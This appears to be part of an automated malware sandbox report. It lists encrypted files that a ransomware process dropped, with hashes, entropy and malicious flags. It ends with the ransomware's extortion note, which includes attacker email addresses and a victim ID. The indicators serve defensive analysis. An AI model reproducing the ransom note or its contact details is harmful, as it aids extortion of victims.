                                                                                                                                            Preview:F.t.h...|.i.....&n~.x.k@....G.7d.2|.;.v.X.e....8..V..PG.7.n".}...Q..._....2!...;..o...@e.c....(,.....&.W....qb&=.[...!...v.[.!..Pm.f%t|......\Z/....K..F/..o.r........X...[.e[.j].......I....W....]......wA..wL.Y..J..."..V2K.CJ....:.$`-.P.Bp..+.. Q.r..^..m.E..5.Se$.......Y.[.R..(...6M..u'..~">.Rm.R...i8Q-..../.?..`/....Rl......v7Jrg.T.X.A.....Np.\S..............^..-9&.c.C.^.....1E~T.`...W.f.@/$O..[t|+T.E..{<....@....@.....e.r..x...S#.41.79"..\............ET...W..`Rp....@..f....1.hO.9$6.Z....I.n...q%E."...q.,...X3.?(....B.d.ja.q...X/...H...y....:.......1b..'.?...58$.Sz(y....h.........H...)....g.]ZLq.^..\....d.osx...x..Y.:'AGO."...Omp...A.:....X.h.|..H`...b.H]..<...h.&lP...).... .B.h.9..(...N.;........._.V......3k .........L...._.....x..5.j|..U.]..F..[..p..8Sc..0...G..`.6Z..!t1...^.p.....Y\].^.......z~f.Hf.0].$.`.z.&A:..=.i...."....K.5/..T.....L.....fNA_)...g*2.....p.|....>>p|q%.Z|..W.^.E..~7.tlhxh..Fyh.....i.c.6.-'R./.NrK.o.......,T..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18666
                                                                                                                                            Entropy (8bit):7.413352943658052
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:4uhl0XYzgFBd+797+2bL3VlfjnQs8k5HralEEL:4uvuYzCBd+p3f78k5gEEL
                                                                                                                                            MD5:6BFC9768BBB73C4BEF1A89ABA4E52F65
                                                                                                                                            SHA1:99A55B903B758819D3FC73762D64E04AFF53C027
                                                                                                                                            SHA-256:18A49FB9C0AC4EC55258AD66B5D5A7A99CC65A31BD189EE37ECFD4B3F0D53098
                                                                                                                                            SHA-512:E8F4A5B989411266205DE68506B9A7CD16C39164B9DEE850F79739A25A57178B59CD41DE1757DF7508B53E79174E7031CCE55AD4EE0B47053CAE2DE8AB80C95E
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.....G0{..n.Y...{.....c....P..$.~6M.u|PhO. .."...G...0....8....u....Lb....].5>..^.}L%.3...,|@......_>...S..^".B2.pNi....y.L.l.......,.M.FA(.........WU.....v..V=uJ..}....a.%..Z....o.....9[..L....$.x......*U.Y.V......o....E.n.9._.A....p..B.l.R..jo.^..*...........|.v.e...$....&..I24...a.z.A|i5K..'<.-S....[.?y.y..4....a`]^I6.z.5F~bK.R......c......J.g7_F.F+8Y...y5.....O...5..<.,.Y...U...tmq..3.../|.oM.%a|4..H.s....N...~...O.OE..3.y`N..d.@&.r7.|.B;...8.Ky.H.!.....P..7Z.........}`w."8........g.R.O.N.?...qCSwD.@Q.........I3g.1e..;..hF.......S..jr.......;....$*r$F.-A.9Xw.......6I5.M.`.2.....I}7...)....(....^..4*3..j..m...l.|.p/...!B.b..c......{..^%..n.4..-.-.........d:.l.j.....ik....:.,.q....*.~....n.;...\.K9nZX...s,.....M.E.yi..@...X.-4CG...........7G.....uy`.R...6:.T0m.~....... .....G.Zy..n..F.t.8.4.na.....#v.$..n...{...F......(P].%..e.i%..+.M....nZT..,.=a.}...*..1..d^...;)Q.;...H...~.C.!..l.OY.?......9?ZBME.F..T.l..c..s<.B..t..u..../.e.l...]..-
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18666
                                                                                                                                            Entropy (8bit):7.413352943658052
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:4uhl0XYzgFBd+797+2bL3VlfjnQs8k5HralEEL:4uvuYzCBd+p3f78k5gEEL
                                                                                                                                            MD5:6BFC9768BBB73C4BEF1A89ABA4E52F65
                                                                                                                                            SHA1:99A55B903B758819D3FC73762D64E04AFF53C027
                                                                                                                                            SHA-256:18A49FB9C0AC4EC55258AD66B5D5A7A99CC65A31BD189EE37ECFD4B3F0D53098
                                                                                                                                            SHA-512:E8F4A5B989411266205DE68506B9A7CD16C39164B9DEE850F79739A25A57178B59CD41DE1757DF7508B53E79174E7031CCE55AD4EE0B47053CAE2DE8AB80C95E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....G0{..n.Y...{.....c....P..$.~6M.u|PhO. .."...G...0....8....u....Lb....].5>..^.}L%.3...,|@......_>...S..^".B2.pNi....y.L.l.......,.M.FA(.........WU.....v..V=uJ..}....a.%..Z....o.....9[..L....$.x......*U.Y.V......o....E.n.9._.A....p..B.l.R..jo.^..*...........|.v.e...$....&..I24...a.z.A|i5K..'<.-S....[.?y.y..4....a`]^I6.z.5F~bK.R......c......J.g7_F.F+8Y...y5.....O...5..<.,.Y...U...tmq..3.../|.oM.%a|4..H.s....N...~...O.OE..3.y`N..d.@&.r7.|.B;...8.Ky.H.!.....P..7Z.........}`w."8........g.R.O.N.?...qCSwD.@Q.........I3g.1e..;..hF.......S..jr.......;....$*r$F.-A.9Xw.......6I5.M.`.2.....I}7...)....(....^..4*3..j..m...l.|.p/...!B.b..c......{..^%..n.4..-.-.........d:.l.j.....ik....:.,.q....*.~....n.;...\.K9nZX...s,.....M.E.yi..@...X.-4CG...........7G.....uy`.R...6:.T0m.~....... .....G.Zy..n..F.t.8.4.na.....#v.$..n...{...F......(P].%..e.i%..+.M....nZT..,.=a.}...*..1..d^...;)Q.;...H...~.C.!..l.OY.?......9?ZBME.F..T.l..c..s<.B..t..u..../.e.l...]..-
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18676
                                                                                                                                            Entropy (8bit):7.411115600092573
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:juHyWuF1zHoHY797+2bL3VlfbnzsokTHralEj:KHiz5x3fcokTgEj
                                                                                                                                            MD5:AA1F9B2C532A80CDE7897F5A867A4AED
                                                                                                                                            SHA1:D3330F75D496EF917930FAEB44A365FC9F3C556E
                                                                                                                                            SHA-256:4430DE40CC8A282B46C46DDF59E67EAC0A9A0354B5B7C99AA5394171AF077AF6
                                                                                                                                            SHA-512:24D7869779BA2D599F6ABDB39CC28E232CFE461041DEF288F67545646EC4F9E4589B5920FC651B96E072EB5F0EE62D7CAB3A5821B1121A28FDBB418F94C6184A
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:...u..__..s.s`.........5Eu..gF..Y.b.......@kX......pOtw..G%2O...i....{f...6.~.q.x..)...oSR....`.....c[...|..".v8w.r.?...`........}.Kt.........Q...-.7.$J._i...Y.i..Tw..@9-.......3^..o.8g..........<F............x"..+K@}....V........"K..<...Z..@2..t..1...>(.>.......%..|k&m..4.Bk....m.I.....~.a...%.Nj.....).)S...Q......=(....}.L{....Pm.V.[.)..S1....+g.2..3...}......Bqa6.....T...6....6c.Kzz...^{....o:.|..Fs.:.F58...t..oi|..*)#x*......*l...w.0..5.`.s.:d.=|.-Po. .v..c.A&.G.......z].u/.[].0.....Kz.x|.4.8.@.v.j..#\.<..sD.u.A,..vrS..Dr..W.....yvm.u5I\...w~0u.~...1|&...QtBv-..&yJ....g..S.....K^..R}.....>W......o<x..I.y......../......hyW..k...R.8..h.&`....v.=K[.~.Q....H....hj..q..).Ejx..[.l'..=.P..EaWP.<s.#...\.B.2.Jx......f.c...f.U...........G..L..q9.1M...%c.....Q..|...ZzL<.3....G.... .=./.N6.Gl.i.&.5..'$..!.t%..!._....A.`..a.l....H.P....u53q....../.E.....Y:.yi......:W..No!9.~.....0xk.=.J......h<8<.....,....1...j.9h..... s3..rKa...EG.h
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18676
                                                                                                                                            Entropy (8bit):7.411115600092573
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:juHyWuF1zHoHY797+2bL3VlfbnzsokTHralEj:KHiz5x3fcokTgEj
                                                                                                                                            MD5:AA1F9B2C532A80CDE7897F5A867A4AED
                                                                                                                                            SHA1:D3330F75D496EF917930FAEB44A365FC9F3C556E
                                                                                                                                            SHA-256:4430DE40CC8A282B46C46DDF59E67EAC0A9A0354B5B7C99AA5394171AF077AF6
                                                                                                                                            SHA-512:24D7869779BA2D599F6ABDB39CC28E232CFE461041DEF288F67545646EC4F9E4589B5920FC651B96E072EB5F0EE62D7CAB3A5821B1121A28FDBB418F94C6184A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...u..__..s.s`.........5Eu..gF..Y.b.......@kX......pOtw..G%2O...i....{f...6.~.q.x..)...oSR....`.....c[...|..".v8w.r.?...`........}.Kt.........Q...-.7.$J._i...Y.i..Tw..@9-.......3^..o.8g..........<F............x"..+K@}....V........"K..<...Z..@2..t..1...>(.>.......%..|k&m..4.Bk....m.I.....~.a...%.Nj.....).)S...Q......=(....}.L{....Pm.V.[.)..S1....+g.2..3...}......Bqa6.....T...6....6c.Kzz...^{....o:.|..Fs.:.F58...t..oi|..*)#x*......*l...w.0..5.`.s.:d.=|.-Po. .v..c.A&.G.......z].u/.[].0.....Kz.x|.4.8.@.v.j..#\.<..sD.u.A,..vrS..Dr..W.....yvm.u5I\...w~0u.~...1|&...QtBv-..&yJ....g..S.....K^..R}.....>W......o<x..I.y......../......hyW..k...R.8..h.&`....v.=K[.~.Q....H....hj..q..).Ejx..[.l'..=.P..EaWP.<s.#...\.B.2.Jx......f.c...f.U...........G..L..q9.1M...%c.....Q..|...ZzL<.3....G.... .=./.N6.Gl.i.&.5..'$..!.t%..!._....A.`..a.l....H.P....u53q....../.E.....Y:.yi......:W..No!9.~.....0xk.=.J......h<8<.....,....1...j.9h..... s3..rKa...EG.h
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):708
                                                                                                                                            Entropy (8bit):7.632629280072568
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:WhDQKmJnJsFDqNy6sTFkorr4gQFisAQMsi/+a+Ln:mDQKWoDFp5rIilci/7U
                                                                                                                                            MD5:907FF38267154B30419C23158EC4B37A
                                                                                                                                            SHA1:88C574B86A6D9246CCB211087439EDE7F7ED1E85
                                                                                                                                            SHA-256:1039FE9037D991AA6F214C1BB3F5C0C9A2B0829450BB6D40240F43C4A9F007A0
                                                                                                                                            SHA-512:895F98645456DA806C276F8437AC63B38F97DD37BB8056BF3B60DCE29D98072FFE88D3A0C32525DFDC6E9782061E87A483D86AB01A03EE30FC041B3EE0464213
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.u...d..-.?m....Q..K..![(...u.h....Dw...$:S..%0.. ..i.........0...M....i..5.. ....ug............:....C]..u..gD..n!..d..g.)'5.Kr.S.5.\..@.5......`..)..<..rp.. .s.....`%.?Uq...I..2P{.S.w..O..x....u......@sP.zxF..E..&.r..g..'..?)\)..-#\.}....}.....1t..j$...o&...zG.N.I..U@...}..SH...=.U....)..}t%X..7.~.(m...O5#.....Rrq.%TtZ.%.ZV..s..p....>K..R...$...G.@.}d...d..P5..d... .(d.X."........b..}m.h..-(..}.-......l....J..3cf3260c"}.......z...D-q..R.T<ci...."W;....'..8......[fXt.`:.i8SN.i..sbk.l.q...i.i..7.....!..+..F...........0 &.....A.;..ol...A.k...G..M...LT#.....Y).#n...c.....*...[..3......0..T...j?...h.....=x.....&.,..8.fm...B...)...?...g.F........E.b..JE.`52nJ...2?.<B..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):708
                                                                                                                                            Entropy (8bit):7.632629280072568
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:WhDQKmJnJsFDqNy6sTFkorr4gQFisAQMsi/+a+Ln:mDQKWoDFp5rIilci/7U
                                                                                                                                            MD5:907FF38267154B30419C23158EC4B37A
                                                                                                                                            SHA1:88C574B86A6D9246CCB211087439EDE7F7ED1E85
                                                                                                                                            SHA-256:1039FE9037D991AA6F214C1BB3F5C0C9A2B0829450BB6D40240F43C4A9F007A0
                                                                                                                                            SHA-512:895F98645456DA806C276F8437AC63B38F97DD37BB8056BF3B60DCE29D98072FFE88D3A0C32525DFDC6E9782061E87A483D86AB01A03EE30FC041B3EE0464213
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.u...d..-.?m....Q..K..![(...u.h....Dw...$:S..%0.. ..i.........0...M....i..5.. ....ug............:....C]..u..gD..n!..d..g.)'5.Kr.S.5.\..@.5......`..)..<..rp.. .s.....`%.?Uq...I..2P{.S.w..O..x....u......@sP.zxF..E..&.r..g..'..?)\)..-#\.}....}.....1t..j$...o&...zG.N.I..U@...}..SH...=.U....)..}t%X..7.~.(m...O5#.....Rrq.%TtZ.%.ZV..s..p....>K..R...$...G.@.}d...d..P5..d... .(d.X."........b..}m.h..-(..}.-......l....J..3cf3260c"}.......z...D-q..R.T<ci...."W;....'..8......[fXt.`:.i8SN.i..sbk.l.q...i.i..7.....!..+..F...........0 &.....A.;..ol...A.k...G..M...LT#.....Y).#n...c.....*...[..3......0..T...j?...h.....=x.....&.,..8.fm...B...)...?...g.F........E.b..JE.`52nJ...2?.<B..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4499
                                                                                                                                            Entropy (8bit):7.954822974465451
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:jt761D1RZEkjerkIUC2g52hHWNzdu1t5upqo6vj:jt7ADZEgIUCNgh2NzdQt59j
                                                                                                                                            MD5:7BA02A746D5456FC9B7FAAD2D0F0D2AD
                                                                                                                                            SHA1:78C6F399F8F57274E848A99A7B1ED08BFDA56B9D
                                                                                                                                            SHA-256:36E911BE7CB75BE2B5D6DB29F3257B525FBD47F20C6EFDA0189A370BE61FFA71
                                                                                                                                            SHA-512:6DE9D01AA49BF4AB8D8C7BAEE254B272B8BBF88C6E2452E4BFDF34A0F5BAD3052AAD5636B14FA7B65DF9925BFB2340AF616508B23DB19BD28FB4B8FD68716FAA
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:j.R....IeM1 ..P.g.....`......xm".r...i.W..v4.J.rR.w..U.e~.....!.....47x.....gY.A$+.G.[:..T...lH(.[Dey'.m.K..S.9.D.o;qB../.x"...K6..Y...O...p..=_5>Isx.'...T.m.-.!|..4?g....|...D.W....V6o?.<...,.n...m..".r....x..5.e.i.)...7.9 .)l..O..f.^t....n.{....@.......A....0h....Y[.]tn.:1\d\...<...r#..8...B~...ZR......3.O}yt...n;[...i4..>t.._.Ct].: .R.vs..<!..j.f.......?.r..L|..+..1!.j.C..]..3N.A.T...L.({.CI...!...C...+..d........J......m...$...$..)~c...^.K..t.~:........>k.w...+/.f.DO.;...".S......F.R.-...$$....Z.....Z2.E.nB0....W..^....xP.(.Ub.k`.CP.....R.,...S...k)..fn.W.\Uc.........&..J..3'....D2.P\.`a..8.py0....Rs...c....L;&...u.2...F..P..Ix...0.....B..`...T.0..)M1...S..\....vVlx...p6.:.1.![.TIE.R...#.{."....s..O=.. .z.{...$..:B..m.,..K/.WAy..........".........Q.WV.>..7...z.|.i........K...0fM.......]......._..E..Tlc......r.Ha..Wt.4....q.....U......0..u.....%..!5...p.YX...q.L._....... .Od.......0l...#.....?./.;.t kw...\./.~.9.....`..\...I..n.....r
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4499
                                                                                                                                            Entropy (8bit):7.954822974465451
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:jt761D1RZEkjerkIUC2g52hHWNzdu1t5upqo6vj:jt7ADZEgIUCNgh2NzdQt59j
                                                                                                                                            MD5:7BA02A746D5456FC9B7FAAD2D0F0D2AD
                                                                                                                                            SHA1:78C6F399F8F57274E848A99A7B1ED08BFDA56B9D
                                                                                                                                            SHA-256:36E911BE7CB75BE2B5D6DB29F3257B525FBD47F20C6EFDA0189A370BE61FFA71
                                                                                                                                            SHA-512:6DE9D01AA49BF4AB8D8C7BAEE254B272B8BBF88C6E2452E4BFDF34A0F5BAD3052AAD5636B14FA7B65DF9925BFB2340AF616508B23DB19BD28FB4B8FD68716FAA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:j.R....IeM1 ..P.g.....`......xm".r...i.W..v4.J.rR.w..U.e~.....!.....47x.....gY.A$+.G.[:..T...lH(.[Dey'.m.K..S.9.D.o;qB../.x"...K6..Y...O...p..=_5>Isx.'...T.m.-.!|..4?g....|...D.W....V6o?.<...,.n...m..".r....x..5.e.i.)...7.9 .)l..O..f.^t....n.{....@.......A....0h....Y[.]tn.:1\d\...<...r#..8...B~...ZR......3.O}yt...n;[...i4..>t.._.Ct].: .R.vs..<!..j.f.......?.r..L|..+..1!.j.C..]..3N.A.T...L.({.CI...!...C...+..d........J......m...$...$..)~c...^.K..t.~:........>k.w...+/.f.DO.;...".S......F.R.-...$$....Z.....Z2.E.nB0....W..^....xP.(.Ub.k`.CP.....R.,...S...k)..fn.W.\Uc.........&..J..3'....D2.P\.`a..8.py0....Rs...c....L;&...u.2...F..P..Ix...0.....B..`...T.0..)M1...S..\....vVlx...p6.:.1.![.TIE.R...#.{."....s..O=.. .z.{...$..:B..m.,..K/.WAy..........".........Q.WV.>..7...z.|.i........K...0fM.......]......._..E..Tlc......r.Ha..Wt.4....q.....U......0..u.....%..!5...p.YX...q.L._....... .Od.......0l...#.....?./.;.t kw...\./.~.9.....`..\...I..n.....r
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):709
                                                                                                                                            Entropy (8bit):7.70917632726547
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:gfNVzARwhXhRQo5HVTdYjxBXP8Gc7DDRL8lPSf8AQd7Q3E0VGYtw7PDwJEO/OzHn:gzzAg7f51hYLXULRw5SUP7Q00Bt+b0/c
                                                                                                                                            MD5:D4EDBB2F8F5F2C9EED18184D32B7AC39
                                                                                                                                            SHA1:5AC2F4E6E5666B129F980FCCA4082FFA760F4B13
                                                                                                                                            SHA-256:5C769220F2EAD09F7E5BAB37680EFD34974B2E5FDE89A284ADE1627A0BE35102
                                                                                                                                            SHA-512:2286EAC143A7BEC017EBB0C2AED864F2506C83188A410064B6C2F2DC11EEB14B5355913DB7E57E38637CE02703612B3CFD6FACE0D41885CF9673DB1FBE3CCFBD
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.`.......]...t.:J..>..."/:.'....{&v.Y..y..UUK.c .{...vb.L.}=.H..}..W...H!..#..h...W.v..!gT@.C..W.|6......8..,...?..z...Q...x...e@..g..E.f........-[...N...r.T6..A|.~S..P...:>....%2~?..3B..(...l.{~?..g.^.W[.|..c5.........#6.H...t.^....ZV')....I....^,....u..?7..M.8a)}......e..T..b..*.PG..<#i.~....._`..u..\73.@..R.|.U.O.#.........w..l3.w......~...8.....k/..Vw...d..K......I..{T.#.y. V.Gho...5?|.j!.{W.=.".'6...;..e3cf3260c"}e..F....G........"..4....Be.]0.9....\..?..u...C..+.....l!...Vk..I.Yh.Nbk.$....{u`.....]sF....6..M.GA..i.Bc..u.......OkuuR...?...L..q.Gnf$.N. .5/..c.F%.F....4P..0.%nJ......0..f.*.I.CT.Y...!.......K...*.p.K.@._j....6w.....gC..y...d>...#.........{0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):709
                                                                                                                                            Entropy (8bit):7.70917632726547
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:gfNVzARwhXhRQo5HVTdYjxBXP8Gc7DDRL8lPSf8AQd7Q3E0VGYtw7PDwJEO/OzHn:gzzAg7f51hYLXULRw5SUP7Q00Bt+b0/c
                                                                                                                                            MD5:D4EDBB2F8F5F2C9EED18184D32B7AC39
                                                                                                                                            SHA1:5AC2F4E6E5666B129F980FCCA4082FFA760F4B13
                                                                                                                                            SHA-256:5C769220F2EAD09F7E5BAB37680EFD34974B2E5FDE89A284ADE1627A0BE35102
                                                                                                                                            SHA-512:2286EAC143A7BEC017EBB0C2AED864F2506C83188A410064B6C2F2DC11EEB14B5355913DB7E57E38637CE02703612B3CFD6FACE0D41885CF9673DB1FBE3CCFBD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.`.......]...t.:J..>..."/:.'....{&v.Y..y..UUK.c .{...vb.L.}=.H..}..W...H!..#..h...W.v..!gT@.C..W.|6......8..,...?..z...Q...x...e@..g..E.f........-[...N...r.T6..A|.~S..P...:>....%2~?..3B..(...l.{~?..g.^.W[.|..c5.........#6.H...t.^....ZV')....I....^,....u..?7..M.8a)}......e..T..b..*.PG..<#i.~....._`..u..\73.@..R.|.U.O.#.........w..l3.w......~...8.....k/..Vw...d..K......I..{T.#.y. V.Gho...5?|.j!.{W.=.".'6...;..e3cf3260c"}e..F....G........"..4....Be.]0.9....\..?..u...C..+.....l!...Vk..I.Yh.Nbk.$....{u`.....]sF....6..M.GA..i.Bc..u.......OkuuR...?...L..q.Gnf$.N. .5/..c.F%.F....4P..0.%nJ......0..f.*.I.CT.Y...!.......K...*.p.K.@._j....6w.....gC..y...d>...#.........{0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15120
                                                                                                                                            Entropy (8bit):7.397343643835031
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:lB1ZjmY6GQ/DoT7VjCo1zssnk9EnKv5rwFe0u:ZRmzGQ/y7dtssk9En056ej
                                                                                                                                            MD5:846C1D50CD67B707DF297B5E48E11A3C
                                                                                                                                            SHA1:D5BD9D0708C41FCC5A44D22466AA1CAA4A55158C
                                                                                                                                            SHA-256:C6A62729D4662C1AE5CD7C1CA4737036DC45CD74A89F5915F36B977DDBF3C662
                                                                                                                                            SHA-512:91DB57FCDC971CE63C282BF14C75B827188EA9F66367CBE6ED74C71043862E031B7DD39F03934EACE6893D85D3F884A1B47CAC45ABE26F7AFC51384D02FC4C6D
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:Y.?....'b.......'.B..LKGT....!L.....p_H6..R.d............e.8.o..=..+x......z...0..w.T.r...SA%.Z[.s.LM..9...X,..w"..`D...w..pv.P...Z.AG.W....|:\.w..J{.ul..M....n...... ...98..M..z..p.\..B...y.J....IX....6SGp..g.gA....AM....N..]o.k..viC.c%u4....8V1.I}z..._2%.H6.K$.6.;..Z4..J....V...M......"Q..A..........dYu.k.fK........Z..pa....*...$.......dE..#U..4..f.L7e1.x..M...w.....5|.~R....7..8...e...r..[.G..N..x^.....D....n....v.F..^....X......eE.EF......cZ..d....e....j..;...J..|%..&B....[..9.ZV..'..G...o.C.F...)..5D....~.S....`...g:}..&.61..F.!.A'p..l..7.....*.).JM...N..+,...}.?..U..-.mW}<5.....3f....k\..V..{.dr6Z..,......4.A..1hX."*4..;S#.,...X..Q.*...q7k.S....Uu.l.{..GQ.b..].x. .|..Qe<dN~.}...$\r...HPT..G..Z...C..7.;.h...T..\J..'..5...B..!~?[e%...}..2L|.(....7..C&...]..+3.A.. W.o.....k]J.......z.A.T...t5a>O...IL......`.I. ......C}.bOc.4X.7m...r....8#n6...0...H.]..L..6.....u..N.PR..f..Eq.DxUwa.y..OB.".b:..0l..4r4D.B.(.}Ay6....{.bBCI.+.)2...Y...[.-.?..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15120
                                                                                                                                            Entropy (8bit):7.397343643835031
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:lB1ZjmY6GQ/DoT7VjCo1zssnk9EnKv5rwFe0u:ZRmzGQ/y7dtssk9En056ej
                                                                                                                                            MD5:846C1D50CD67B707DF297B5E48E11A3C
                                                                                                                                            SHA1:D5BD9D0708C41FCC5A44D22466AA1CAA4A55158C
                                                                                                                                            SHA-256:C6A62729D4662C1AE5CD7C1CA4737036DC45CD74A89F5915F36B977DDBF3C662
                                                                                                                                            SHA-512:91DB57FCDC971CE63C282BF14C75B827188EA9F66367CBE6ED74C71043862E031B7DD39F03934EACE6893D85D3F884A1B47CAC45ABE26F7AFC51384D02FC4C6D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:Y.?....'b.......'.B..LKGT....!L.....p_H6..R.d............e.8.o..=..+x......z...0..w.T.r...SA%.Z[.s.LM..9...X,..w"..`D...w..pv.P...Z.AG.W....|:\.w..J{.ul..M....n...... ...98..M..z..p.\..B...y.J....IX....6SGp..g.gA....AM....N..]o.k..viC.c%u4....8V1.I}z..._2%.H6.K$.6.;..Z4..J....V...M......"Q..A..........dYu.k.fK........Z..pa....*...$.......dE..#U..4..f.L7e1.x..M...w.....5|.~R....7..8...e...r..[.G..N..x^.....D....n....v.F..^....X......eE.EF......cZ..d....e....j..;...J..|%..&B....[..9.ZV..'..G...o.C.F...)..5D....~.S....`...g:}..&.61..F.!.A'p..l..7.....*.).JM...N..+,...}.?..U..-.mW}<5.....3f....k\..V..{.dr6Z..,......4.A..1hX."*4..;S#.,...X..Q.*...q7k.S....Uu.l.{..GQ.b..].x. .|..Qe<dN~.}...$\r...HPT..G..Z...C..7.;.h...T..\J..'..5...B..!~?[e%...}..2L|.(....7..C&...]..+3.A.. W.o.....k]J.......z.A.T...t5a>O...IL......`.I. ......C}.bOc.4X.7m...r....8#n6...0...H.]..L..6.....u..N.PR..f..Eq.DxUwa.y..OB.".b:..0l..4r4D.B.(.}Ay6....{.bBCI.+.)2...Y...[.-.?..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
